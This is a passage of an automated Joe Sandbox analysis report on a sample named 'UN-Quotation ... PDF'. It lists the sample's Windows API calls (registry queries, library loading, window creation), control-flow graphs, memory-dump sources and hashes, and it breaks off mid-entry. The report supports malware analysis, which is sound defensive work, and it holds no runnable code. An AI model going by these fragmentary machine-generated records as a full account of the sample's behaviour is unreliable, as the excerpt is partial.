                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6C33F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 6987f085258670344bcf559675ddc1d1dbdd649be529cc8c0099ed6e05a71caf
                                                        • Instruction ID: aad44589b7f7f4785f55ab59ca17d3da975224a3fcbf7a290713d592680a6f7e
                                                        • Opcode Fuzzy Hash: 6987f085258670344bcf559675ddc1d1dbdd649be529cc8c0099ed6e05a71caf
                                                        • Instruction Fuzzy Hash: 0021D4B6901248AFDB10CFA9D884ADEBFF4EB49324F14805AE955A7310D378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 135 b6c2b8-b6c34c DuplicateHandle 136 b6c355-b6c372 135->136 137 b6c34e-b6c354 135->137 137->136
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6C33F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 6a7c240b5b5c99baff592598e3b18295424bc1062c2c0103bcbf167a8948e6c9
                                                        • Instruction ID: cb9074458e702cc69edcca9726c2a558d8de53883ae7a688cfbbf39fdd13f781
                                                        • Opcode Fuzzy Hash: 6a7c240b5b5c99baff592598e3b18295424bc1062c2c0103bcbf167a8948e6c9
                                                        • Instruction Fuzzy Hash: F021B3B5900248AFDB10CF99D884ADEBBF8EB48324F14841AE955A3310D378A954CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 148 b6a1f0-b6a238 149 b6a240-b6a26f LoadLibraryExW 148->149 150 b6a23a-b6a23d 148->150 151 b6a271-b6a277 149->151 152 b6a278-b6a295 149->152 150->149 151->152
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6A051,00000800,00000000,00000000), ref: 00B6A262
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 017826ab8901a091b36c0c5d09ce0d1642e5c3355cb5136026e01339f0639565
                                                        • Instruction ID: 3188ea57bda9125c5427f0931b3289818643c918d4c8c3cc413e6c8d58b38029
                                                        • Opcode Fuzzy Hash: 017826ab8901a091b36c0c5d09ce0d1642e5c3355cb5136026e01339f0639565
                                                        • Instruction Fuzzy Hash: 8A21F2B29042499FCB10CFAAD884ADEFBF4EB89324F14856AD525B7210C379A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 140 b69110-b6a238 142 b6a240-b6a26f LoadLibraryExW 140->142 143 b6a23a-b6a23d 140->143 144 b6a271-b6a277 142->144 145 b6a278-b6a295 142->145 143->142 144->145
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6A051,00000800,00000000,00000000), ref: 00B6A262
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 264096684efe610a69ddf3b0a42f1157ac5ce3a302cef2d804728d929ab251f5
                                                        • Instruction ID: 55acb1feed1c9a7bedfb7b6dfa97d3d38eb6f49f4111d9ee56e19d9f75fe4697
                                                        • Opcode Fuzzy Hash: 264096684efe610a69ddf3b0a42f1157ac5ce3a302cef2d804728d929ab251f5
                                                        • Instruction Fuzzy Hash: 871103B29042499FDF10CF9AD444B9EFBF4EB48324F14846AD515B7600C379A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 155 b69f70-b69fb0 156 b69fb2-b69fb5 155->156 157 b69fb8-b69fe3 GetModuleHandleW 155->157 156->157 158 b69fe5-b69feb 157->158 159 b69fec-b6a000 157->159 158->159
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00B69FD6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: eccadc7b29834732f1cfa671538b2a42cc7085d68e77e3e7a1ca76f18e52ee73
                                                        • Instruction ID: a57049e6978fdc4b11c59d4aaa725eef873161a5796b03e5b4f63bc453c69ed3
                                                        • Opcode Fuzzy Hash: eccadc7b29834732f1cfa671538b2a42cc7085d68e77e3e7a1ca76f18e52ee73
                                                        • Instruction Fuzzy Hash: 0811D2B5D006499FCB10CF9AD444BDEFBF8EB88324F15845AD419B7600D379A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1da0c4f5e80231a41900a3fcdcadfa5a914ea19601eb5528a8c22731e4d040fc
                                                        • Instruction ID: 50724178bace88c3c59158378a11870d7ef0a8fa27d0ec8df02327b866af62d3
                                                        • Opcode Fuzzy Hash: 1da0c4f5e80231a41900a3fcdcadfa5a914ea19601eb5528a8c22731e4d040fc
                                                        • Instruction Fuzzy Hash: 7912C7F1C917468AD710CF56E9D818E3B60F744328BD06A08D2631BAD9D7B815EEEF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8b44f3b1035aaf486b49ec056c71888f67c7a1b820e3bbbb3dd2afaf09186b0
                                                        • Instruction ID: ae81c0a62cb48a815ffbfd561a90f534191d7b7705195da42393dbd3854db347
                                                        • Opcode Fuzzy Hash: f8b44f3b1035aaf486b49ec056c71888f67c7a1b820e3bbbb3dd2afaf09186b0
                                                        • Instruction Fuzzy Hash: D7A16C36E002198FCF05DFA5C8845AEBBF2FF85300B1585AAE915BB225DB39E955CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c286bbcfaad95d1a86db857ad490b5181302770f939b8222357e6f397d14323
                                                        • Instruction ID: 86208819bd966f7d4276b8ea0fc9a328cb5acbce158e44f191a4f271f018d865
                                                        • Opcode Fuzzy Hash: 0c286bbcfaad95d1a86db857ad490b5181302770f939b8222357e6f397d14323
                                                        • Instruction Fuzzy Hash: 45C13BB1C917458BD710CF66E8D818E3B61FB85328FD06B09D1622B6D8D7B814EAEF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage: 12.8%
                                                        Dynamic/Decrypted Code Coverage: 100%
                                                        Signature Coverage: 1.6%
                                                        Total number of Nodes: 187
                                                        Total number of Limit Nodes: 13
                                                        execution_graph 41563 6498f98 41564 6498fb7 LdrInitializeThunk 41563->41564 41566 6498feb 41564->41566 41428 6624b40 41429 6624b61 41428->41429 41431 6624b84 41428->41431 41430 6624e28 41431->41430 41434 66250ca RegQueryValueExW 41431->41434 41435 6625168 RegQueryValueExW 41431->41435 41436 6625108 RegQueryValueExW 41431->41436 41437 6624e50 41431->41437 41442 6624eb0 41431->41442 41434->41431 41435->41431 41436->41431 41438 6624e5a 41437->41438 41439 6624e71 41438->41439 41440 6624f19 RegOpenKeyExW 41438->41440 41439->41431 41441 6624f76 41440->41441 41441->41441 41443 6624f02 RegOpenKeyExW 41442->41443 41445 6624f76 41443->41445 41408 2d4b0d0 41409 2d4b0ee 41408->41409 41412 2d49e18 41409->41412 41411 2d4b125 41414 2d4cff8 LoadLibraryA 41412->41414 41415 2d4d0d4 41414->41415 41446 2d44560 41447 2d44574 41446->41447 41450 2d447aa 41447->41450 41448 2d4457d 41451 2d447b3 41450->41451 41456 2d449a6 41450->41456 41461 2d4498c 41450->41461 41466 2d44883 41450->41466 41471 2d44890 41450->41471 41451->41448 41457 2d449b9 41456->41457 41458 2d449cb 41456->41458 41476 2d44c98 41457->41476 41481 2d44c88 41457->41481 41462 2d4493f 41461->41462 41463 2d449cb 41462->41463 41464 2d44c98 2 API calls 41462->41464 41465 2d44c88 2 API calls 41462->41465 41464->41463 41465->41463 41467 2d448d4 41466->41467 41468 2d449cb 41467->41468 41469 2d44c98 2 API calls 41467->41469 41470 2d44c88 2 API calls 41467->41470 41469->41468 41470->41468 41472 2d448d4 41471->41472 41473 2d449cb 41472->41473 41474 2d44c98 2 API calls 41472->41474 41475 2d44c88 2 API calls 41472->41475 41474->41473 41475->41473 41477 2d44ca6 41476->41477 41486 2d44cd8 41477->41486 41490 2d44ce8 41477->41490 41478 2d44cb6 41478->41458 41482 2d44c98 41481->41482 41484 2d44cd8 RtlEncodePointer 41482->41484 41485 2d44ce8 RtlEncodePointer 41482->41485 41483 2d44cb6 41483->41458 41484->41483 41485->41483 41487 2d44ce8 41486->41487 41488 2d44d4c RtlEncodePointer 
41487->41488 41489 2d44d75 41487->41489 41488->41489 41489->41478 41491 2d44d22 41490->41491 41492 2d44d4c RtlEncodePointer 41491->41492 41493 2d44d75 41491->41493 41492->41493 41493->41478 41416 645a840 41417 645a868 41416->41417 41420 645a894 41416->41420 41418 645a871 41417->41418 41421 6459d4c 41417->41421 41422 6459d57 41421->41422 41423 645ab8b 41422->41423 41425 6459d68 41422->41425 41423->41420 41426 645abc0 OleInitialize 41425->41426 41427 645ac24 41426->41427 41427->41423 41571 12ae3dc 41572 12ae3f4 41571->41572 41573 12ae44e 41572->41573 41579 6456690 41572->41579 41583 6453788 41572->41583 41591 6457768 41572->41591 41600 645667f 41572->41600 41604 64537cc 41572->41604 41580 64566b6 41579->41580 41581 64537cc CallWindowProcW 41580->41581 41582 64566d7 41581->41582 41582->41573 41584 645376f 41583->41584 41584->41583 41585 6458c42 41584->41585 41586 6458cec 41584->41586 41587 64537c7 41584->41587 41588 6458c9a CallWindowProcW 41585->41588 41590 6458c49 41585->41590 41589 64537cc CallWindowProcW 41586->41589 41587->41573 41588->41590 41589->41590 41590->41573 41594 64577a5 41591->41594 41592 64577d9 41595 64577d7 41592->41595 41629 6453894 41592->41629 41594->41592 41596 64577c9 41594->41596 41613 64578f0 41596->41613 41618 64579cc 41596->41618 41624 6457900 41596->41624 41601 6456690 41600->41601 41602 64537cc CallWindowProcW 41601->41602 41603 64566d7 41602->41603 41603->41573 41605 64537d7 41604->41605 41606 64577d9 41605->41606 41609 64577c9 41605->41609 41607 64577d7 41606->41607 41608 6453894 CallWindowProcW 41606->41608 41608->41607 41610 64578f0 CallWindowProcW 41609->41610 41611 6457900 CallWindowProcW 41609->41611 41612 64579cc CallWindowProcW 41609->41612 41610->41607 41611->41607 41612->41607 41615 6457914 41613->41615 41614 64579a0 41614->41595 41633 64579a8 41615->41633 41637 64579b8 41615->41637 41619 645798a 41618->41619 41620 64579da 41618->41620 41622 64579a8 CallWindowProcW 41619->41622 41623 64579b8 CallWindowProcW 41619->41623 41621 
64579a0 41621->41595 41622->41621 41623->41621 41626 6457914 41624->41626 41625 64579a0 41625->41595 41627 64579a8 CallWindowProcW 41626->41627 41628 64579b8 CallWindowProcW 41626->41628 41627->41625 41628->41625 41630 645389f 41629->41630 41631 6458c9a CallWindowProcW 41630->41631 41632 6458c49 41630->41632 41631->41632 41632->41595 41634 64579b8 41633->41634 41635 64579c9 41634->41635 41640 6458bd9 41634->41640 41635->41614 41638 64579c9 41637->41638 41639 6458bd9 CallWindowProcW 41637->41639 41638->41614 41639->41638 41641 6453894 CallWindowProcW 41640->41641 41642 6458bea 41641->41642 41642->41635 41555 6624928 41557 6624949 41555->41557 41556 6624b25 41557->41556 41558 6624e50 RegOpenKeyExW 41557->41558 41559 6624eb0 RegOpenKeyExW 41557->41559 41560 66250ca RegQueryValueExW 41557->41560 41561 6625168 RegQueryValueExW 41557->41561 41562 6625108 RegQueryValueExW 41557->41562 41558->41557 41559->41557 41560->41557 41561->41557 41562->41557 41494 6454178 41496 64541a9 41494->41496 41497 645429a 41494->41497 41495 64541b5 41496->41495 41503 64543e0 41496->41503 41506 64543da 41496->41506 41498 64541f5 41510 64556c0 41498->41510 41515 64556d0 41498->41515 41520 6454420 41503->41520 41504 64543ea 41504->41498 41507 64543e0 41506->41507 41509 6454420 2 API calls 41507->41509 41508 64543ea 41508->41498 41509->41508 41511 64556d0 41510->41511 41512 64557a1 41511->41512 41541 6456479 41511->41541 41548 6456488 41511->41548 41516 64556fa 41515->41516 41517 64557a1 41516->41517 41518 6456479 2 API calls 41516->41518 41519 6456488 CreateWindowExW 41516->41519 41518->41517 41519->41517 41521 64543b5 41520->41521 41522 645442b 41520->41522 41521->41504 41523 645445b 41522->41523 41529 64546a8 41522->41529 41533 64546b8 41522->41533 41523->41504 41524 6454453 41524->41523 41525 6454658 GetModuleHandleW 41524->41525 41526 6454685 41525->41526 41526->41504 41530 64546cc 41529->41530 41532 64546f1 41530->41532 41537 6453668 41530->41537 41532->41524 41534 64546cc 41533->41534 
41535 6453668 LoadLibraryExW 41534->41535 41536 64546f1 41534->41536 41535->41536 41536->41524 41538 6454878 LoadLibraryExW 41537->41538 41540 64548f1 41538->41540 41540->41532 41542 64564c6 CreateWindowExW 41541->41542 41543 645648e 41541->41543 41547 64565fc 41542->41547 41551 64537a4 41543->41551 41549 64564bd 41548->41549 41550 64537a4 CreateWindowExW 41548->41550 41549->41512 41550->41549 41552 64564d8 CreateWindowExW 41551->41552 41554 64565fc 41552->41554

                                                        Control-flow Graph

                                                        control_flow_graph 1511 6498f98-6498fe4 LdrInitializeThunk 1515 6498feb-6498ff7 1511->1515 1516 6498ffd-6499006 1515->1516 1517 6499215-6499228 1515->1517 1518 649924a 1516->1518 1519 649900c-6499021 1516->1519 1520 649924f-6499253 1517->1520 1518->1520 1524 649903b-6499056 1519->1524 1525 6499023-6499036 1519->1525 1521 649925e 1520->1521 1522 6499255 1520->1522 1526 649925f 1521->1526 1522->1521 1534 6499058-6499062 1524->1534 1535 6499064 1524->1535 1527 64991e9-64991ed 1525->1527 1526->1526 1528 64991f8 1527->1528 1529 64991ef 1527->1529 1531 64991f9 1528->1531 1529->1528 1531->1531 1536 6499069-649906b 1534->1536 1535->1536 1537 649906d-6499080 1536->1537 1538 6499085-6499120 1536->1538 1537->1527 1556 649912e 1538->1556 1557 6499122-649912c 1538->1557 1558 6499133-6499135 1556->1558 1557->1558 1559 6499193-64991e7 1558->1559 1560 6499137-6499139 1558->1560 1559->1527 1561 649913b-6499145 1560->1561 1562 6499147 1560->1562 1564 649914c-649914e 1561->1564 1562->1564 1564->1559 1565 6499150-6499191 1564->1565 1565->1559
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fcbdccec313b186a3534ad3b05fc09688adbda4266d6a8680d6d82e6a5ff153a
                                                        • Instruction ID: 24110ca9d5fea9280c9af137b745df3ab6fd95cd8658d2ad1d31ff2d54a6a689
                                                        • Opcode Fuzzy Hash: fcbdccec313b186a3534ad3b05fc09688adbda4266d6a8680d6d82e6a5ff153a
                                                        • Instruction Fuzzy Hash: 13714834E402098FDF54EFB0D9586AEBBB6BF85349F14892AD002A7394DF349D46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1454 6454420-6454429 1455 64543b5-64543c9 1454->1455 1456 645442b-6454445 call 6453620 1454->1456 1459 6454447 1456->1459 1460 645445b-645445f 1456->1460 1509 645444d call 64546a8 1459->1509 1510 645444d call 64546b8 1459->1510 1461 6454461-645446b 1460->1461 1462 6454473-64544b4 1460->1462 1461->1462 1467 64544b6-64544be 1462->1467 1468 64544c1-64544cf 1462->1468 1463 6454453-6454455 1463->1460 1465 6454590-6454650 1463->1465 1504 6454652-6454655 1465->1504 1505 6454658-6454683 GetModuleHandleW 1465->1505 1467->1468 1470 64544d1-64544d6 1468->1470 1471 64544f3-64544f5 1468->1471 1472 64544e1 1470->1472 1473 64544d8-64544df call 645362c 1470->1473 1474 64544f8-64544ff 1471->1474 1477 64544e3-64544f1 1472->1477 1473->1477 1478 6454501-6454509 1474->1478 1479 645450c-6454513 1474->1479 1477->1474 1478->1479 1480 6454515-645451d 1479->1480 1481 6454520-6454529 1479->1481 1480->1481 1485 6454536-645453b 1481->1485 1486 645452b-6454533 1481->1486 1488 645453d-6454544 1485->1488 1489 6454559-6454566 1485->1489 1486->1485 1488->1489 1490 6454546-6454556 call 6451544 call 645363c 1488->1490 1496 6454589-645458f 1489->1496 1497 6454568-6454586 1489->1497 1490->1489 1497->1496 1504->1505 1506 6454685-645468b 1505->1506 1507 645468c-64546a0 1505->1507 1506->1507 1509->1463 1510->1463
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06454676
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 2f0d89834f56a110a3c077b48f114ee6d852be4a2f388c79c18330e63bbc654d
                                                        • Instruction ID: bc8699bbb93f8313f380cd1644972668528e3d851058c40b7199600c35d42b16
                                                        • Opcode Fuzzy Hash: 2f0d89834f56a110a3c077b48f114ee6d852be4a2f388c79c18330e63bbc654d
                                                        • Instruction Fuzzy Hash: 96814470A00B058FD765DF2AD44079ABBF1BB88304F058A2EE95ADBB41DB34E845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1576 66254a8-66254c7 1577 66254c9-66254d3 1576->1577 1578 66254ec-66254f9 1576->1578 1579 66254d5-66254e6 1577->1579 1580 66254e8-66254eb 1577->1580 1582 6625542-662554d 1578->1582 1583 66254fb-662553f 1578->1583 1579->1580 1586 6625554 1582->1586 1583->1582 1587 662555b-6625572 LdrInitializeThunk 1586->1587 1589 66256bb-66256d8 1587->1589 1590 6625578-6625592 1587->1590 1604 66256dd-66256e6 1589->1604 1590->1589 1594 6625598-66255b2 1590->1594 1600 66255b4-66255b6 1594->1600 1601 66255b8 1594->1601 1602 66255bb-6625616 1600->1602 1601->1602 1611 6625618-662561a 1602->1611 1612 662561c 1602->1612 1613 662561f-66256b9 1611->1613 1612->1613 1613->1604
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b393ca7f7efd7ba406129033b33883ce2c886145d889b758a9fe8bacb1ddeb95
                                                        • Instruction ID: 934af5172208dbaf3d062ae457b055ce3b43cb0cd3d6397c84ccb9611554d7c7
                                                        • Opcode Fuzzy Hash: b393ca7f7efd7ba406129033b33883ce2c886145d889b758a9fe8bacb1ddeb95
                                                        • Instruction Fuzzy Hash: 4A51D430A102459FCB50EB74D854AEEBBB6FF85304F14896AE502DB795EF30DC098BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b1aba51dbe13dc033ddd74828aee1971d8550b6967ab783b97fcd636b46159d8
                                                        • Instruction ID: 86e9623dc83391e1a9aab1a6d31a4e2814cbfa8f7abf579d7307c918344803d8
                                                        • Opcode Fuzzy Hash: b1aba51dbe13dc033ddd74828aee1971d8550b6967ab783b97fcd636b46159d8
                                                        • Instruction Fuzzy Hash: 7151A430A102059FCB54EBB4D894AAEB7F6FF85304F148969D512DB794EF30EC498BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064565EA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 48385ba8accb609f282f0036b3ef004a1209335291c90cc62fc22b7b3e5a537d
                                                        • Instruction ID: c57fd9ee9ea6da372f49f8cfd090d0a157f3bdf0c89a78f14d700c67593f6336
                                                        • Opcode Fuzzy Hash: 48385ba8accb609f282f0036b3ef004a1209335291c90cc62fc22b7b3e5a537d
                                                        • Instruction Fuzzy Hash: C451F1B1D00249EFDF02CFA9C984ADDBFB2BF48314F15816AE818AB221D7719855CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a65e66eb9ddb228f5152a12954773da8e30bc0ea8cc37fac328b193901fe707a
                                                        • Instruction ID: 2399240c89b1d8477103f454d890d2b24da71fae417f648cc853109748325593
                                                        • Opcode Fuzzy Hash: a65e66eb9ddb228f5152a12954773da8e30bc0ea8cc37fac328b193901fe707a
                                                        • Instruction Fuzzy Hash: 78516BB5E012599FCB20CFA9C984ADEBFF5AF48304F14806AE819EB351D7309945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06625221
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: a0fb37a59135a39946bfc0fad29f2fad55603fde4e474f4dec073ee3a919dabc
                                                        • Instruction ID: 22b468b47599686a686323ce5cee37552bae10aa70583f21e8b5f674f188fc04
                                                        • Opcode Fuzzy Hash: a0fb37a59135a39946bfc0fad29f2fad55603fde4e474f4dec073ee3a919dabc
                                                        • Instruction Fuzzy Hash: 6B517EB5D053599FCB20CF99C984ADEBFF5AF49304F14806AE81AAB351D7309945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06624F64
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: b68625a9bc778026b16bbe90832aad82edbdddcf5ac906d10357bd0b0d915179
                                                        • Instruction ID: 28f036924ef5ac284f0a16bf7a167d6bb06f7f1f1bb964fbfa89a5068a268c64
                                                        • Opcode Fuzzy Hash: b68625a9bc778026b16bbe90832aad82edbdddcf5ac906d10357bd0b0d915179
                                                        • Instruction Fuzzy Hash: 95414670D053898FDB10CF99C544B8EBFF5AF88304F29816AE409AB341DB749885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064565EA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: ecb9b84ed34ac7b1ea8de85123e47059f3533af1115a50240597a0892f1de9a5
                                                        • Instruction ID: 484939396e04011858ceb7bcc8e6edc11b23b2beefc349166210ba6a7d75b5d9
                                                        • Opcode Fuzzy Hash: ecb9b84ed34ac7b1ea8de85123e47059f3533af1115a50240597a0892f1de9a5
                                                        • Instruction Fuzzy Hash: D351DFB1D00309EFDB14CF99C984ADEBBB5FF48314F65812AE819AB211D774A885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06458CC1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 572a6b47e3ec37c57b633f9071029faf7b0e7506e4c9522a42ded3d826344886
                                                        • Instruction ID: 4dec8c5027ee8b0bbb8579f3a4ad694c2f60db1d24b0642f4f8bde8ed14380c5
                                                        • Opcode Fuzzy Hash: 572a6b47e3ec37c57b633f9071029faf7b0e7506e4c9522a42ded3d826344886
                                                        • Instruction Fuzzy Hash: C4415AB4A00215DFDB51CF89C488AAABBF5FF88314F25C55AD419AB321DB34A845CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fa0cb39a380625fbae54d8047ef1c1abc0b883d3b25e6a0a5288246b63895902
